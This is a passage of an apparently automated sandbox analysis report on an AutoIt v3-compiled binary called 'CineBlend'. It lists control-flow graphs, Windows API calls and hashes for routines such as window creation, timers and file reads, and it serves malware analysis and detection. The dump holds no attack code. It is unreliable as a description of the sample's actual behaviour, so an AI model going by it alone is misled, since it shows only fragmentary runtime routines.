                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: d2a14cd99298bd6dea25daf8113b393e4c21d000f87e16ecb40bed9ebf1eca51
                                          • Instruction ID: 6470abc1206e8496392a7f694cdd2e9f33fe7fc5dd3179918d64ca56ee1d6596
                                          • Opcode Fuzzy Hash: d2a14cd99298bd6dea25daf8113b393e4c21d000f87e16ecb40bed9ebf1eca51
                                          • Instruction Fuzzy Hash: 7B213D79E00314ABDB109FA5EC55BEDBFF8FB09B50F44801AE614A72B0D7B909548F90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 507 b4370f-b43724 508 b43784-b43786 507->508 509 b43726-b43729 507->509 508->509 512 b43788 508->512 510 b4378a 509->510 511 b4372b-b43732 509->511 516 b43790-b43795 510->516 517 b83df4-b83e1c call b42f92 call b5f23c 510->517 513 b43804-b4380c PostQuitMessage 511->513 514 b43738-b4373d 511->514 515 b4376f-b43777 DefWindowProcW 512->515 522 b437b8-b437ba 513->522 518 b43743-b43747 514->518 519 b83e61-b83e75 call bac8f7 514->519 521 b4377d-b43783 515->521 523 b43797-b4379a 516->523 524 b437bc-b437e3 SetTimer RegisterWindowMessageW 516->524 553 b83e21-b83e28 517->553 525 b4374d-b43752 518->525 526 b4380e-b4381d call b5fcad 518->526 519->522 544 b83e7b 519->544 522->521 530 b437a0-b437b3 KillTimer call b43907 call b459ff 523->530 531 b83d95-b83d98 523->531 524->522 527 b437e5-b437f0 CreatePopupMenu 524->527 533 b43758-b4375d 525->533 534 b83e46-b83e4d 525->534 526->522 527->522 530->522 538 b83d9a-b83d9e 531->538 539 b83dd0-b83def MoveWindow 531->539 542 b437f2-b43802 call b4381f 533->542 543 b43763-b43769 533->543 534->515 541 b83e53-b83e5c call ba1423 534->541 547 b83dbf-b83dcb SetFocus 538->547 548 b83da0-b83da3 538->548 539->522 541->515 542->522 543->515 543->553 544->515 547->522 548->543 549 b83da9-b83dba call b42f92 548->549 549->522 553->515 557 b83e2e-b83e41 call b43907 call b4396b 553->557 557->515
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00B43709,?,?), ref: 00B43777
                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00B43709,?,?), ref: 00B437A3
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B437C6
                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00B43709,?,?), ref: 00B437D1
                                          • CreatePopupMenu.USER32 ref: 00B437E5
                                          • PostQuitMessage.USER32(00000000), ref: 00B43806
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated
                                          • API String ID: 129472671-2362178303
                                          • Opcode ID: d9bf1e6fa87cbd29a18d5758957af2ac04c08fd2771303e34e9445abc7238190
                                          • Instruction ID: ab9e9fa83cc25b71806273c090373ad1f19aebba158c9613c3fc1354878f71d9
                                          • Opcode Fuzzy Hash: d9bf1e6fa87cbd29a18d5758957af2ac04c08fd2771303e34e9445abc7238190
                                          • Instruction Fuzzy Hash: 844114F4200140BBDB142B2CCC99FBD7BE9F706F10F0881A5F582861A1DA789FA4B361

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 563 b42ab0-b42ae9 564 b83a1a-b83a1b DestroyWindow 563->564 565 b42aef-b42b05 mciSendStringW 563->565 568 b83a26-b83a33 564->568 566 b42d66-b42d73 565->566 567 b42b0b-b42b13 565->567 570 b42d75-b42d90 UnregisterHotKey 566->570 571 b42d98-b42d9f 566->571 567->568 569 b42b19-b42b28 call b42ede 567->569 572 b83a62-b83a69 568->572 573 b83a35-b83a38 568->573 584 b83a70-b83a7c 569->584 585 b42b2e-b42b36 569->585 570->571 575 b42d92-b42d93 call b42770 570->575 571->567 576 b42da5 571->576 572->568 581 b83a6b 572->581 577 b83a3a-b83a42 call b47aab 573->577 578 b83a44-b83a47 FindClose 573->578 575->571 576->566 583 b83a4d-b83a5a 577->583 578->583 581->584 583->572 589 b83a5c-b83a5d call bb3cf6 583->589 586 b83a7e-b83a80 FreeLibrary 584->586 587 b83a86-b83a8d 584->587 590 b42b3c-b42b61 call b4e6a0 585->590 591 b83a94-b83aa1 585->591 586->587 587->584 592 b83a8f 587->592 589->572 601 b42b63 590->601 602 b42b98-b42ba3 CoUninitialize 590->602 593 b83ac8-b83acf 591->593 594 b83aa3-b83ac0 VirtualFree 591->594 592->591 593->591 598 b83ad1 593->598 594->593 597 b83ac2-b83ac3 call bb3d5c 594->597 597->593 605 b83ad6-b83ada 598->605 603 b42b66-b42b96 call b430c0 call b43069 601->603 604 b42ba9-b42bae 602->604 602->605 603->602 607 b42bb4-b42bbe 604->607 608 b83aeb-b83af8 call bb3d30 604->608 605->604 609 b83ae0-b83ae4 call bb0b4c 605->609 612 b42bc4-b42c45 call b4bd98 call b42ff4 call b42e85 call b60184 call b42e1c call b4bd98 call b4e6a0 call b42eae call b60184 607->612 613 b42da7-b42db4 call b5fb19 607->613 621 b83afa 608->621 615 b83ae6 609->615 625 b83aff-b83b21 call b6013d 612->625 653 b42c4b-b42c6f call b60184 612->653 613->612 623 b42dba 613->623 615->604 621->625 623->613 631 b83b23 625->631 635 b83b28-b83b4a call b6013d 631->635 641 b83b4c 635->641 643 b83b51-b83b73 call b6013d 641->643 649 b83b75 643->649 652 b83b7a-b83b87 call ba6e3b 649->652 658 b83b89 652->658 653->635 659 b42c75-b42c99 call b60184 653->659 662 b83b8e-b83b9b call b5bdf0 658->662 659->643 663 b42c9f-b42cb9 call b60184 659->663 668 b83b9d 662->668 663->652 669 b42cbf-b42ce3 call b42e85 call b60184 663->669 671 b83ba2-b83baf call bb3c8a 668->671 669->662 678 b42ce9-b42cf1 669->678 676 b83bb1 671->676 679 b83bb6-b83bc3 call bb3d11 676->679 678->671 680 b42cf7-b42d15 call b4bd98 call b42fba 678->680 685 b83bc5 679->685 680->679 689 b42d1b-b42d29 680->689 688 b83bca-b83bd7 call bb3d11 685->688 695 b83bd9 688->695 689->688 690 b42d2f-b42d65 call b4bd98 * 3 call b42f26 689->690 695->695
                                          APIs
                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B42AF9
                                          • CoUninitialize.COMBASE ref: 00B42B98
                                          • UnregisterHotKey.USER32(?), ref: 00B42D7D
                                          • DestroyWindow.USER32(?), ref: 00B83A1B
                                          • FreeLibrary.KERNEL32(?), ref: 00B83A80
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B83AAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                          • String ID: close all
                                          • API String ID: 469580280-3243417748
                                          • Opcode ID: 014e0f81ac658e3191e7e0c676dc52de1757ad4afaf4b4d4b94120b47ae40b62
                                          • Instruction ID: 63c13456dd840ae6a018b2c3d370f624b58a8955140050fc3f1814917c8e5081
                                          • Opcode Fuzzy Hash: 014e0f81ac658e3191e7e0c676dc52de1757ad4afaf4b4d4b94120b47ae40b62
                                          • Instruction Fuzzy Hash: 89D159716012129FCB19EF14C895A69F7E4EF04B10F5542EEE94A6B261CB31AE12EF40

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 703 b790c5-b790d5 704 b790d7-b790ea call b6f636 call b6f649 703->704 705 b790ef-b790f1 703->705 719 b79471 704->719 706 b790f7-b790fd 705->706 707 b79459-b79466 call b6f636 call b6f649 705->707 706->707 709 b79103-b7912e 706->709 724 b7946c call b72b5c 707->724 709->707 712 b79134-b7913d 709->712 716 b79157-b79159 712->716 717 b7913f-b79152 call b6f636 call b6f649 712->717 722 b79455-b79457 716->722 723 b7915f-b79163 716->723 717->724 725 b79474-b79479 719->725 722->725 723->722 727 b79169-b7916d 723->727 724->719 727->717 730 b7916f-b79186 727->730 732 b791a3-b791ac 730->732 733 b79188-b7918b 730->733 734 b791ae-b791c5 call b6f636 call b6f649 call b72b5c 732->734 735 b791ca-b791d4 732->735 736 b79195-b7919e 733->736 737 b7918d-b79193 733->737 767 b7938c 734->767 740 b791d6-b791d8 735->740 741 b791db-b791f9 call b73b93 call b72d38 * 2 735->741 738 b7923f-b79259 736->738 737->734 737->736 743 b7925f-b7926f 738->743 744 b7932d-b79336 call b7fc1b 738->744 740->741 771 b79216-b7923c call b797a4 741->771 772 b791fb-b79211 call b6f649 call b6f636 741->772 743->744 748 b79275-b79277 743->748 755 b793a9 744->755 756 b79338-b7934a 744->756 748->744 752 b7927d-b792a3 748->752 752->744 757 b792a9-b792bc 752->757 759 b793ad-b793c5 ReadFile 755->759 756->755 761 b7934c-b7935b GetConsoleMode 756->761 757->744 762 b792be-b792c0 757->762 765 b793c7-b793cd 759->765 766 b79421-b7942c GetLastError 759->766 761->755 768 b7935d-b79361 761->768 762->744 769 b792c2-b792ed 762->769 765->766 775 b793cf 765->775 773 b79445-b79448 766->773 774 b7942e-b79440 call b6f649 call b6f636 766->774 777 b7938f-b79399 call b72d38 767->777 768->759 776 b79363-b7937d ReadConsoleW 768->776 769->744 770 b792ef-b79302 769->770 770->744 779 b79304-b79306 770->779 771->738 772->767 786 b79385-b7938b call b6f613 773->786 787 b7944e-b79450 773->787 774->767 783 b793d2-b793e4 775->783 784 b7937f GetLastError 776->784 785 b7939e-b793a7 776->785 777->725 779->744 789 b79308-b79328 779->789 783->777 793 b793e6-b793ea 783->793 784->786 785->783 786->767 787->777 789->744 797 b79403-b7940e 793->797 798 b793ec-b793fc call b78de1 793->798 803 b79410 call b78f31 797->803 804 b7941a-b7941f call b78c21 797->804 810 b793ff-b79401 798->810 808 b79415-b79418 803->808 804->808 808->810 810->777
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63b2828bdc9db564b75252869c30804ffcc027543ccdba13e6ab738437734e5f
                                          • Instruction ID: c9db62f9f478e5e2e969d62290fbb7fa0fd3a56d10f277186c051aeb18ab2a3f
                                          • Opcode Fuzzy Hash: 63b2828bdc9db564b75252869c30804ffcc027543ccdba13e6ab738437734e5f
                                          • Instruction Fuzzy Hash: CFC1D271904249AFDF11DFA8D841BADBBF0FF0A310F1981D9E968A7392C7349942CB65

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 811 b5ac3e-b5b063 call b48ec0 call b5bc58 call b4e6a0 818 b5b069-b5b073 811->818 819 b98584-b98591 811->819 822 b9896b-b98979 818->822 823 b5b079-b5b07e 818->823 820 b98593 819->820 821 b98596-b985a5 819->821 820->821 824 b985aa 821->824 825 b985a7 821->825 826 b9897b 822->826 827 b9897e 822->827 828 b5b084-b5b090 call b5b5b6 823->828 829 b985b2-b985b4 823->829 824->829 825->824 826->827 830 b98985-b9898e 827->830 834 b985bd 828->834 836 b5b096-b5b0a3 call b4c98d 828->836 829->834 832 b98990 830->832 833 b98993 830->833 832->833 838 b9899c-b989eb call b4e6a0 call b5bbbe * 2 833->838 837 b985c7 834->837 842 b5b0ab-b5b0b4 836->842 843 b985cf-b985d2 837->843 871 b5b1e0-b5b1f5 838->871 872 b989f1-b98a03 call b5b5b6 838->872 845 b5b0b8-b5b0d6 call b64d98 842->845 846 b985d8-b98600 call b64cd3 call b47ad5 843->846 847 b5b158-b5b16f 843->847 865 b5b0e5 845->865 866 b5b0d8-b5b0e1 845->866 881 b9862d-b98651 call b47b1a call b4bd98 846->881 882 b98602-b98606 846->882 849 b5b175 847->849 850 b98954-b98957 847->850 854 b988ff-b98920 call b4e6a0 849->854 855 b5b17b-b5b17e 849->855 856 b9895d-b98960 850->856 857 b98a41-b98a79 call b4e6a0 call b5bbbe 850->857 854->871 886 b98926-b98938 call b5b5b6 854->886 862 b98729-b98743 call b5bbbe 855->862 863 b5b184-b5b187 855->863 856->838 864 b98962-b98965 856->864 857->871 907 b98a7f-b98a91 call b5b5b6 857->907 903 b98749-b9874c 862->903 904 b9888f-b988b5 call b4e6a0 862->904 873 b986ca-b986e0 call b46c03 863->873 874 b5b18d-b5b190 863->874 864->822 864->871 865->837 877 b5b0eb-b5b0fc 865->877 866->845 875 b5b0e3 866->875 888 b98ac9-b98acf 871->888 889 b5b1fb-b5b20b call b4e6a0 871->889 912 b98a2f-b98a3c call b4c98d 872->912 913 b98a05-b98a0d 872->913 873->871 910 b986e6-b986fc call b5b5b6 873->910 884 b5b196-b5b1b8 call b4e6a0 874->884 885 b98656-b98659 874->885 875->877 877->822 887 b5b102-b5b11c 877->887 881->885 882->881 894 b98608-b9862b call b4ad40 882->894 884->871 929 b5b1ba-b5b1cc call b5b5b6 884->929 885->822 900 b9865f-b98674 call b46c03 885->900 932 b9893a-b98943 call b4c98d 886->932 933 b98945 886->933 887->843 899 b5b122-b5b154 call b5bbbe call b4e6a0 887->899 888->842 892 b98ad5 888->892 892->822 894->881 894->882 899->847 900->871 950 b9867a-b98690 call b5b5b6 900->950 905 b987bf-b987de call b4e6a0 903->905 906 b9874e-b98751 903->906 904->871 937 b988bb-b988cd call b5b5b6 904->937 905->871 957 b987e4-b987f6 call b5b5b6 905->957 919 b98ada-b98ae8 906->919 920 b98757-b98774 call b4e6a0 906->920 953 b98a93-b98a9b 907->953 954 b98ab5-b98abe call b4c98d 907->954 958 b9870d-b98716 call b48ec0 910->958 959 b986fe-b9870b call b48ec0 910->959 965 b98ac2-b98ac4 912->965 927 b98a0f-b98a13 913->927 928 b98a1e-b98a29 call b4b4b1 913->928 940 b98aea 919->940 941 b98aed-b98afd 919->941 920->871 968 b9877a-b9878c call b5b5b6 920->968 927->928 943 b98a15-b98a19 927->943 928->912 976 b98b0b-b98b19 928->976 977 b986ba-b986c3 call b4c98d 929->977 978 b5b1d2-b5b1de 929->978 949 b98949-b9894f 932->949 933->949 983 b988cf-b988dc call b4c98d 937->983 984 b988de 937->984 940->941 960 b98aff 941->960 961 b98b02-b98b06 941->961 962 b98aa1-b98aa3 943->962 949->871 979 b9869d-b986ab call b48ec0 950->979 980 b98692-b9869b call b4c98d 950->980 969 b98aa8-b98ab3 call b4b4b1 953->969 970 b98a9d 953->970 954->965 957->871 999 b987fc-b98805 call b5b5b6 957->999 1000 b98719-b98724 call b48577 958->1000 959->1000 960->961 961->889 962->871 965->871 1003 b9879f 968->1003 1004 b9878e-b9879d call b4c98d 968->1004 969->954 969->976 970->962 989 b98b1b 976->989 990 b98b1e-b98b21 976->990 977->873 978->871 1010 b986ae-b986b5 979->1010 980->1010 998 b988e2-b988e9 983->998 984->998 989->990 990->830 1006 b988eb-b988f0 call b4396b 998->1006 1007 b988f5 call b43907 998->1007 1021 b98818 999->1021 1022 b98807-b98816 call b4c98d 999->1022 1000->871 1012 b987a3-b987ae call b69334 1003->1012 1004->1012 1006->871 1020 b988fa 1007->1020 1010->871 1012->822 1026 b987b4-b987ba 1012->1026 1020->871 1025 b9881c-b9883f 1021->1025 1022->1025 1028 b9884d-b98850 1025->1028 1029 b98841-b98848 1025->1029 1026->871 1030 b98860-b98863 1028->1030 1031 b98852-b9885b 1028->1031 1029->1028 1032 b98873-b98876 1030->1032 1033 b98865-b9886e 1030->1033 1031->1030 1032->871 1034 b9887c-b9888a 1032->1034 1033->1032 1034->871
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                          • API String ID: 0-4285391669
                                          • Opcode ID: 68909768160ab5880e056c1398b6cd0919d682576ddbed8ce42fde03f3267689
                                          • Instruction ID: 43afafc5ddb9d471f2c18e5160d26b705b31d1c5a05daaba904e99eb9f85710b
                                          • Opcode Fuzzy Hash: 68909768160ab5880e056c1398b6cd0919d682576ddbed8ce42fde03f3267689
                                          • Instruction Fuzzy Hash: 2E6259755083418FCB24DF24C094AAAFBE1FF89304F1489AEE8999B351DB71D949CF92

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1035 b435b3-b43623 CreateWindowExW * 2 ShowWindow * 2
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B435E1
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B43602
                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00B43368,?), ref: 00B43616
                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00B43368,?), ref: 00B4361F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 2e1b0348d53d5f627339acd3474a332ecbcfa7097ac419924128274815c6592d
                                          • Instruction ID: e62a79428c7e22af606da05c9b983463672d55c6b1a264c90b44ab137504a098
                                          • Opcode Fuzzy Hash: 2e1b0348d53d5f627339acd3474a332ecbcfa7097ac419924128274815c6592d
                                          • Instruction Fuzzy Hash: 50F05E79640295BAE73107136C08FBB7FBDE7C7F10F40805EBA14A7270D6694861DAB0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1036 bb1196-bb11bf InterlockedExchange 1037 bb11cd-bb11f6 call b6017b ReadFile 1036->1037 1038 bb11c1-bb11c8 call b6017b 1036->1038 1043 bb12ae-bb12b2 1037->1043 1044 bb11fc-bb1200 1037->1044 1038->1037 1047 bb12c1-bb12d0 InterlockedExchange 1043->1047 1048 bb12b4-bb12b7 call b60184 1043->1048 1045 bb12a8-bb12ab 1044->1045 1046 bb1206-bb121b EnterCriticalSection 1044->1046 1045->1043 1049 bb1269-bb12a2 call b61190 LeaveCriticalSection ReadFile 1046->1049 1050 bb121d-bb122c 1046->1050 1054 bb12bc-bb12c0 1048->1054 1049->1044 1049->1045 1052 bb122e 1050->1052 1053 bb1234-bb1266 call b82430 call b6017b call b61190 call b60184 1050->1053 1052->1053 1053->1049 1054->1047
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00BB11B3
                                          • ReadFile.KERNELBASE(?,?,0000FFFF,?,00000000), ref: 00BB11EE
                                          • EnterCriticalSection.KERNEL32(?), ref: 00BB120A
                                          • LeaveCriticalSection.KERNEL32(?), ref: 00BB1283
                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00BB129A
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB12C8
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                          • String ID:
                                          • API String ID: 3368777196-0
                                          • Opcode ID: 857fced6f43a39b9fc45b7434877b7809b07ca47ffa80f83ddd212c1c49ecd45
                                          • Instruction ID: 930bd7509c4010c3258c8d3145444245219dbd04e347740a0cb4b97c4806134d
                                          • Opcode Fuzzy Hash: 857fced6f43a39b9fc45b7434877b7809b07ca47ffa80f83ddd212c1c49ecd45
                                          • Instruction Fuzzy Hash: 7D415971900205EFDF04AF58DC85AAAB7B8FF05310F1484A5FA00AB296DB74DE51DBA0

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00B4327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B432AF
                                            • Part of subcall function 00B4327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B432B7
                                            • Part of subcall function 00B4327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B432C2
                                            • Part of subcall function 00B4327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B432CD
                                            • Part of subcall function 00B4327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B432D5
                                            • Part of subcall function 00B4327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B432DD
                                            • Part of subcall function 00B43205: RegisterWindowMessageW.USER32(00000004,?,00B42964), ref: 00B4325D
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B42A0A
                                          • OleInitialize.OLE32 ref: 00B42A28
                                          • CloseHandle.KERNELBASE(00000000,00000000), ref: 00B83A0D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                          • String ID: (I$I
                                          • API String ID: 1986988660-552130911
                                          • Opcode ID: 452574a6f0cef26836626ad94f23b2c9383a437d227d1de4ca15fb58de794267
                                          • Instruction ID: c6d746ee31d29ad3fd5968176add7fed6e7c6b0df0a5dfb8846254895fd1cbba
                                          • Opcode Fuzzy Hash: 452574a6f0cef26836626ad94f23b2c9383a437d227d1de4ca15fb58de794267
                                          • Instruction Fuzzy Hash: 17719DB99112008ED788EF79ECA57DD7AE6FB4B304340C1AAE048C73A1EB704565EF54

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1108 b7316b-b73182 GetLastError 1109 b73184-b7318e call b73581 1108->1109 1110 b73190-b73197 call b74ff0 1108->1110 1109->1110 1115 b731e1-b731e8 SetLastError 1109->1115 1114 b7319c-b731a2 1110->1114 1116 b731a4 1114->1116 1117 b731ad-b731bb call b735d7 1114->1117 1119 b731ea-b731ef 1115->1119 1120 b731a5-b731ab call b72d38 1116->1120 1124 b731c0-b731d6 call b72f56 call b72d38 1117->1124 1125 b731bd-b731be 1117->1125 1126 b731d8-b731df SetLastError 1120->1126 1124->1115 1124->1126 1125->1120 1126->1119
                                          APIs
                                          • GetLastError.KERNEL32(76F82E40,?,?,00B6F64E,00B73BD6,?,?,00B60165,?,?,00BB11D9,0000FFFF), ref: 00B73170
                                          • _free.LIBCMT ref: 00B731A5
                                          • _free.LIBCMT ref: 00B731CC
                                          • SetLastError.KERNEL32(00000000), ref: 00B731D9
                                          • SetLastError.KERNEL32(00000000), ref: 00B731E2
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: c1116eb66f9268fb0709951de5f7dac162b47ae469c16c4d6578ae0a03db6eba
                                          • Instruction ID: 0929761100ec44e3a63a5cd9d1ab31f60ea1fa06e0fce6d2c7da9b0b52ec0a94
                                          • Opcode Fuzzy Hash: c1116eb66f9268fb0709951de5f7dac162b47ae469c16c4d6578ae0a03db6eba
                                          • Instruction Fuzzy Hash: 5E01D176685A007B96122734AC85E6A27E9EFD1B7276184A9F83DB2582EE218A016121

                                          Control-flow Graph

                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B85287
                                            • Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A
